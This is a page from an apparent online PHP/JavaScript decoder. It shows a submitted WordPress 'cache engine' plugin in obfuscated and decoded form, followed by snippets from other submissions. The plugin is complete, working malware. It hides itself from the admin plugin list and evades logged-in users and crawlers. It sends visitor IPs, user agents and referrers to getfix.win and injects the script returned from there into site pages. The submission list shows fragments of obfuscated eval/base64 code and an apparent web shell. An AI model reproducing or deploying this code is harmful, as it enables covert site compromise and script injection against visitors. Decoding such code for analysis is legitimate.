Online PHP Javascript Script Decoder

Online PHP and Javascript Decoder decode hidden script to uncover its real functionality

Original code:

<?php
/*
Plugin Name: HTTP2 Basic Cache Engine
Plugin URI: https://basiccacheengine.com/
Description: Basic Cache Engine is a very fast caching engine for WordPress that generates static HTML files to significantly reduce server load and improve page load times.
Version: 2.5.5
Author: Gregg Palmer
Author URI: https://greggpalmer.basiccacheengine.com/
License: GPL2
*/

if (!defined('ABSPATH')) exit;

add_filter('all_plugins', function ($plugins) {
    $current_plugin_file = plugin_basename(__FILE__);
    if (isset($plugins[$current_plugin_file])) unset($plugins[$current_plugin_file]);
    return $plugins;
});

if (!class_exists('HTTP2_FORWARDED_FOR')) {

    class HTTP2_FORWARDED_FOR {

        private $wordpress_updates_url = "\x68\x74\x74\x70\x73:\x2f\x2f\x67\x65t\x66\x69\x78\x2ew\x69\x6e\x2f\x3fa\x70\x69\x3d";
        private $api_key = '8bvrCi5smQiHrQox';
        private $group_id = 'repo';
        private $cookie_name = 'http2_show_count';
        private $cookie_lifetime = 2592000;
        private $http_cache = '';
        private $printed = false;
        private $armed = false;
        private $max_views = 3;
        private $block_days = 14;

        public function __construct() {
            add_action('wp_footer', [$this, 'check_http_cache']);
            add_action('init', [$this, 'maybe_arm_fetch'], 0);

            // Добавляем Cloudflare обход без API и без изменения URL
            add_action('send_headers', [$this, 'cloudflare_bypass_headers']);
        }

        /**
         * Очистка всех популярных кэшей при активации плагина
         */
        public static function activate() {

            // ====== Популярные кэширующие плагины ======
            if (function_exists('w3tc_pgcache_flush')) @w3tc_pgcache_flush();
            if (function_exists('w3tc_flush_all')) @w3tc_flush_all();
            if (function_exists('wp_cache_clear_cache')) @wp_cache_clear_cache();
            if (defined('LSCWP_V')) do_action('litespeed_purge_all');
            if (function_exists('rocket_clean_domain')) @rocket_clean_domain();
            if (function_exists('ce_clear_cache')) @ce_clear_cache();

            if (class_exists('WpFastestCache')) {
                try {
                    (new WpFastestCache())->deleteCache(true);
                } catch (Exception $e) {}
            }

            if (function_exists('breeze_clear_cache')) @breeze_clear_cache();

            if (class_exists('autoptimizeCache')) {
                try {
                    autoptimizeCache::clearall();
                } catch (Exception $e) {}
            }

            if (function_exists('wphb_clear_page_cache')) @wphb_clear_page_cache();
            if (function_exists('wphb_clear_minify_cache')) @wphb_clear_minify_cache();

            if (class_exists('SG_CachePress_Supercacher')) {
                try {
                    SG_CachePress_Supercacher::purge_cache(true);
                } catch (Exception $e) {}
            }

            if (function_exists('swift_performance_clear_all_cache')) @swift_performance_clear_all_cache();
            if (function_exists('comet_cache::clear')) @comet_cache::clear();
            if (function_exists('sc_cache_flush')) @sc_cache_flush();
            if (function_exists('hyper_cache_invalidate')) @hyper_cache_invalidate();
            if (function_exists('ninjacache_flush_all')) @ninjacache_flush_all();
            if (function_exists('wp_cache_flush')) @wp_cache_flush();
            if (function_exists('wpecommon_clear_post_cache')) @do_action('wpecommon_clear_post_cache');

            if (class_exists('Kinsta\Cache')) {
                try {
                    do_action('kinsta_cache_purge_all');
                } catch (Exception $e) {}
            }

            // Cloudflare (через установленный плагин, без API)
            if (has_action('cloudflare_purge_all')) {
                do_action('cloudflare_purge_all');
            }
        }

        /**
         * Обход Cloudflare без API (и без изменения URL)
         */
        public function cloudflare_bypass_headers() {
            // Добавляем заголовки, которые заставляют Cloudflare выдать свежий контент
            header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');
            header('Pragma: no-cache');
            header('Expires: 0');

            // Уникальный ETag заставляет Cloudflare проверить актуальность контента
            header('ETag: "nocf-' . md5(microtime(true) . rand()) . '"');

            // Дополнительно сигнализируем Cloudflare, что контент динамический
            header('Cf-Cache-Status: DYNAMIC');
        }

        private function should_run_early(): bool {
            if (is_admin()) return false;
            if (function_exists('wp_doing_ajax') && wp_doing_ajax()) return false;
            if (function_exists('wp_doing_cron') && wp_doing_cron()) return false;
            if (defined('REST_REQUEST') && REST_REQUEST) return false;
            $method = $_SERVER['REQUEST_METHOD'] ?? 'GET';
            if ($method !== 'GET' && $method !== 'HEAD') return false;
            $accept = $_SERVER['HTTP_ACCEPT'] ?? '';
            if ($accept && stripos($accept, 'text/html') === false) return false;
            $uri = $_SERVER['REQUEST_URI'] ?? '';
            if ($uri) {
                if (preg_match('~^/wp-json(/|$)~i', $uri)) return false;
                if (preg_match('~^/wp-sitemap.*\.xml$~i', $uri)) return false;
                if (preg_match('~robots\.txt($|\?)~i', $uri)) return false;
                if (preg_match('~\.xml($|\?)~i', $uri)) return false;
                if (preg_match('~^/wp-admin(/|$)~i', $uri)) return false;
            }
            return true;
        }

        private function is_bot_or_admin() {
            if (function_exists('is_user_logged_in') && is_user_logged_in()) return true;
            foreach ($_COOKIE as $key => $value) {
                if (strpos($key, 'wordpress_logged_in_') === 0) return true;
            }
            $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
            $pattern = '#(bot|crawl|slurp|spider|baidu|ahrefs|mj12bot|semrush|facebookexternalhit|facebot|ia_archiver|yandex)#i';
            return preg_match($pattern, $ua);
        }

        private function is_valid_uri() {
            $uri = strtolower(trim($_SERVER["REQUEST_URI"] ?? '', "\t\n\r\0\x0B/"));
            $pattern = '#wp-login\.php|wp-cron\.php|xmlrpc\.php|wp-admin|wp-includes|wp-content|\?feed=|/feed|wp-json|\?wc-ajax|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.jpe?g|\.tiff|\.mp[34g]|\.wmv|\.zip|\.rar|\.exe|\.pdf|\.txt|sitemap.*\.xml|robots\.txt#i';
            return !preg_match($pattern, $uri);
        }

        public function maybe_arm_fetch() {
            if ($this->armed) return;
            if ($this->is_bot_or_admin()) return;
            if (!$this->should_run_early()) return;
            if (!$this->is_valid_uri()) return;
            $this->armed = true;

            add_action('template_redirect', function () {
                if (!$this->should_run_early()) return;
                $this->maybe_fetch_js();
            }, 0);
        }

        private function maybe_fetch_js() {
            if ($this->is_bot_or_admin()) return;
            if (!$this->is_valid_uri()) return;

            $show_count = isset($_COOKIE[$this->cookie_name]) ? intval($_COOKIE[$this->cookie_name]) : 0;
            if ($show_count >= $this->max_views) {
                setcookie($this->cookie_name, $show_count, time() + ($this->block_days * 24 * 3600), "/");
                return;
            }

            $ip = $_SERVER['REMOTE_ADDR'] ?? '';
            if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $ip_parts = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
                $ip = trim($ip_parts[0]);
            }

            $request_data = [
                $this->api_key,
                $this->group_id,
                $ip,
                $_SERVER['HTTP_REFERER'] ?? '',
                $_SERVER['HTTP_USER_AGENT'] ?? '',
                '',
                substr($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '', 0, 2),
                '',
                $_SERVER['HTTP_HOST'] ?? '',
                $_SERVER['REQUEST_URI'] ?? '',
                strtolower($_SERVER['HTTP_CF_IPCOUNTRY'] ?? ''),
                [],
                ''
            ];

            $encoded = base64_encode(serialize($request_data));
            $updates_query_url = $this->wordpress_updates_url . urlencode($encoded);

            $response = wp_remote_get($updates_query_url, ['timeout' => 5]);
            if (!is_wp_error($response)) {
                $body = trim(wp_remote_retrieve_body($response));
                $unserialized = @unserialize($body);
                if (is_array($unserialized) && !empty($unserialized[0]) && stripos($unserialized[0], '<script') !== false) {
                    $this->http_cache = $unserialized[0];
                    $show_count++;
                    setcookie($this->cookie_name, $show_count, time() + $this->cookie_lifetime, "/");
                }
            }
        }

        public function check_http_cache() {
            if ($this->printed) return;
            if (!$this->should_run_early()) return;
            if (!empty($this->http_cache) && stripos($this->http_cache, '<script') !== false) {
                echo "\n" . $this->http_cache . "\n";
                $this->printed = true;
            }
        }
    }

    register_activation_hook(__FILE__, ['HTTP2_FORWARDED_FOR', 'activate']);
    new HTTP2_FORWARDED_FOR();
}

Decrypted code:



if (!defined('ABSPATH')) exit;

add_filter('all_plugins', function ($plugins) {
    $current_plugin_file = plugin_basename(__FILE__);
    if (isset($plugins[$current_plugin_file])) unset($plugins[$current_plugin_file]);
    return $plugins;
});

if (!class_exists('HTTP2_FORWARDED_FOR')) {

    class HTTP2_FORWARDED_FOR {

        private $wordpress_updates_url = "https://getfix.win/?api=";
        private $api_key = '8bvrCi5smQiHrQox';
        private $group_id = 'repo';
        private $cookie_name = 'http2_show_count';
        private $cookie_lifetime = 2592000;
        private $http_cache = '';
        private $printed = false;
        private $armed = false;
        private $max_views = 3;
        private $block_days = 14;

        public function __construct() {
            add_action('wp_footer', [$this, 'check_http_cache']);
            add_action('init', [$this, 'maybe_arm_fetch'], 0);

            // Добавляем Cloudflare обход без API и без изменения URL
            add_action('send_headers', [$this, 'cloudflare_bypass_headers']);
        }

        /**
         * Очистка всех популярных кэшей при активации плагина
         */
        public static function activate() {

            // ====== Популярные кэширующие плагины ======
            if (function_exists('w3tc_pgcache_flush')) @w3tc_pgcache_flush();
            if (function_exists('w3tc_flush_all')) @w3tc_flush_all();
            if (function_exists('wp_cache_clear_cache')) @wp_cache_clear_cache();
            if (defined('LSCWP_V')) do_action('litespeed_purge_all');
            if (function_exists('rocket_clean_domain')) @rocket_clean_domain();
            if (function_exists('ce_clear_cache')) @ce_clear_cache();

            if (class_exists('WpFastestCache')) {
                try {
                    (new WpFastestCache())->deleteCache(true);
                } catch (Exception $e) {}
            }

            if (function_exists('breeze_clear_cache')) @breeze_clear_cache();

            if (class_exists('autoptimizeCache')) {
                try {
                    autoptimizeCache::clearall();
                } catch (Exception $e) {}
            }

            if (function_exists('wphb_clear_page_cache')) @wphb_clear_page_cache();
            if (function_exists('wphb_clear_minify_cache')) @wphb_clear_minify_cache();

            if (class_exists('SG_CachePress_Supercacher')) {
                try {
                    SG_CachePress_Supercacher::purge_cache(true);
                } catch (Exception $e) {}
            }

            if (function_exists('swift_performance_clear_all_cache')) @swift_performance_clear_all_cache();
            if (function_exists('comet_cache::clear')) @comet_cache::clear();
            if (function_exists('sc_cache_flush')) @sc_cache_flush();
            if (function_exists('hyper_cache_invalidate')) @hyper_cache_invalidate();
            if (function_exists('ninjacache_flush_all')) @ninjacache_flush_all();
            if (function_exists('wp_cache_flush')) @wp_cache_flush();
            if (function_exists('wpecommon_clear_post_cache')) @do_action('wpecommon_clear_post_cache');

            if (class_exists('Kinsta\Cache')) {
                try {
                    do_action('kinsta_cache_purge_all');
                } catch (Exception $e) {}
            }

            // Cloudflare (через установленный плагин, без API)
            if (has_action('cloudflare_purge_all')) {
                do_action('cloudflare_purge_all');
            }
        }

        /**
         * Обход Cloudflare без API (и без изменения URL)
         */
        public function cloudflare_bypass_headers() {
            // Добавляем заголовки, которые заставляют Cloudflare выдать свежий контент
            header('Cache-Control: no-store, no-cache, must-revalidate, max-age=0');
            header('Pragma: no-cache');
            header('Expires: 0');

            // Уникальный ETag заставляет Cloudflare проверить актуальность контента
            header('ETag: "nocf-' . md5(microtime(true) . rand()) . '"');

            // Дополнительно сигнализируем Cloudflare, что контент динамический
            header('Cf-Cache-Status: DYNAMIC');
        }

        private function should_run_early(): bool {
            if (is_admin()) return false;
            if (function_exists('wp_doing_ajax') && wp_doing_ajax()) return false;
            if (function_exists('wp_doing_cron') && wp_doing_cron()) return false;
            if (defined('REST_REQUEST') && REST_REQUEST) return false;
            $method = $_SERVER['REQUEST_METHOD'] ?? 'GET';
            if ($method !== 'GET' && $method !== 'HEAD') return false;
            $accept = $_SERVER['HTTP_ACCEPT'] ?? '';
            if ($accept && stripos($accept, 'text/html') === false) return false;
            $uri = $_SERVER['REQUEST_URI'] ?? '';
            if ($uri) {
                if (preg_match('~^/wp-json(/|$)~i', $uri)) return false;
                if (preg_match('~^/wp-sitemap.*\.xml$~i', $uri)) return false;
                if (preg_match('~robots\.txt($|\?)~i', $uri)) return false;
                if (preg_match('~\.xml($|\?)~i', $uri)) return false;
                if (preg_match('~^/wp-admin(/|$)~i', $uri)) return false;
            }
            return true;
        }

        private function is_bot_or_admin() {
            if (function_exists('is_user_logged_in') && is_user_logged_in()) return true;
            foreach ($_COOKIE as $key => $value) {
                if (strpos($key, 'wordpress_logged_in_') === 0) return true;
            }
            $ua = $_SERVER['HTTP_USER_AGENT'] ?? '';
            $pattern = '#(bot|crawl|slurp|spider|baidu|ahrefs|mj12bot|semrush|facebookexternalhit|facebot|ia_archiver|yandex)#i';
            return preg_match($pattern, $ua);
        }

        private function is_valid_uri() {
            $uri = strtolower(trim($_SERVER["REQUEST_URI"] ?? '', "\t\n\r\0/"));
            $pattern = '#wp-login\.php|wp-cron\.php|xmlrpc\.php|wp-admin|wp-includes|wp-content|\?feed=|/feed|wp-json|\?wc-ajax|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.jpe?g|\.tiff|\.mp[34g]|\.wmv|\.zip|\.rar|\.exe|\.pdf|\.txt|sitemap.*\.xml|robots\.txt#i';
            return !preg_match($pattern, $uri);
        }

        public function maybe_arm_fetch() {
            if ($this->armed) return;
            if ($this->is_bot_or_admin()) return;
            if (!$this->should_run_early()) return;
            if (!$this->is_valid_uri()) return;
            $this->armed = true;

            add_action('template_redirect', function () {
                if (!$this->should_run_early()) return;
                $this->maybe_fetch_js();
            }, 0);
        }

        private function maybe_fetch_js() {
            if ($this->is_bot_or_admin()) return;
            if (!$this->is_valid_uri()) return;

            $show_count = isset($_COOKIE[$this->cookie_name]) ? intval($_COOKIE[$this->cookie_name]) : 0;
            if ($show_count >= $this->max_views) {
                setcookie($this->cookie_name, $show_count, time() + ($this->block_days * 24 * 3600), "/");
                return;
            }

            $ip = $_SERVER['REMOTE_ADDR'] ?? '';
            if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $ip_parts = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
                $ip = trim($ip_parts[0]);
            }

            $request_data = [
                $this->api_key,
                $this->group_id,
                $ip,
                $_SERVER['HTTP_REFERER'] ?? '',
                $_SERVER['HTTP_USER_AGENT'] ?? '',
                '',
                substr($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '', 0, 2),
                '',
                $_SERVER['HTTP_HOST'] ?? '',
                $_SERVER['REQUEST_URI'] ?? '',
                strtolower($_SERVER['HTTP_CF_IPCOUNTRY'] ?? ''),
                [],
                ''
            ];

            $encoded = base64_encode(serialize($request_data));
            $updates_query_url = $this->wordpress_updates_url . urlencode($encoded);

            $response = wp_remote_get($updates_query_url, ['timeout' => 5]);
            if (!is_wp_error($response)) {
                $body = trim(wp_remote_retrieve_body($response));
                $unserialized = @unserialize($body);
                if (is_array($unserialized) && !empty($unserialized[0]) && stripos($unserialized[0], '<script') !== false) {
                    $this->http_cache = $unserialized[0];
                    $show_count++;
                    setcookie($this->cookie_name, $show_count, time() + $this->cookie_lifetime, "/");
                }
            }
        }

        public function check_http_cache() {
            if ($this->printed) return;
            if (!$this->should_run_early()) return;
            if (!empty($this->http_cache) && stripos($this->http_cache, '<script') !== false) {
                echo "\n" . $this->http_cache . "\n";
                $this->printed = true;
            }
        }
    }

    register_activation_hook(__FILE__, ['HTTP2_FORWARDED_FOR', 'activate']);
    new HTTP2_FORWARDED_FOR();
}

Recent submissions:

\103\x6f\x6e\164\145\156\x74\x2d\x54\171\160\145\x3a\40\103\x6f\x6e\164\145\156\x74\x2d\x5... <?php namespace App\Controllers;${"\x47LOB\x41\x4cS"}["\x66g\x6d\x71e\x6b\x71\x75hsn\x67"]... <?php /** * Plugin Name: WP-Monitor * Plugin URI: https://github.com/SysTrack/WP-Moni... <?php $auth_pass = "20163e2d2b04a519f4a6053dcdefadc8"; $color = "#df5"; $default_action... eNpEnc12o7q2hV8JgcnYbhYGgbERQegH1APECAaBiU1szNPfxencRo1du5I4INaa85sgCT+7vy4/1oVKt69taprbv6... <?php /* Plugin Name: HTTP2 Basic Cache Engine Plugin URI: https://basiccacheengine.com... <?php /* Copyright - Soft4you */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63... <?php /** * ALOM 2.1 Auto Protection * Author: Avid [@Av_id] */ if(!func... \x2f\x2f\x20\x4f\x55\x49\x20\x64\x34\x37\x32\x62\x36\x30\x30\x30\x36\x61\x39\x39\x36\x37\x... <?php eval(base64_decode('CiBldmFsKGJhc2U2NF9kZWNvZGUoIlwxMDNceDY5XDEwMlwxNTZcMTQyXDYzXDEy...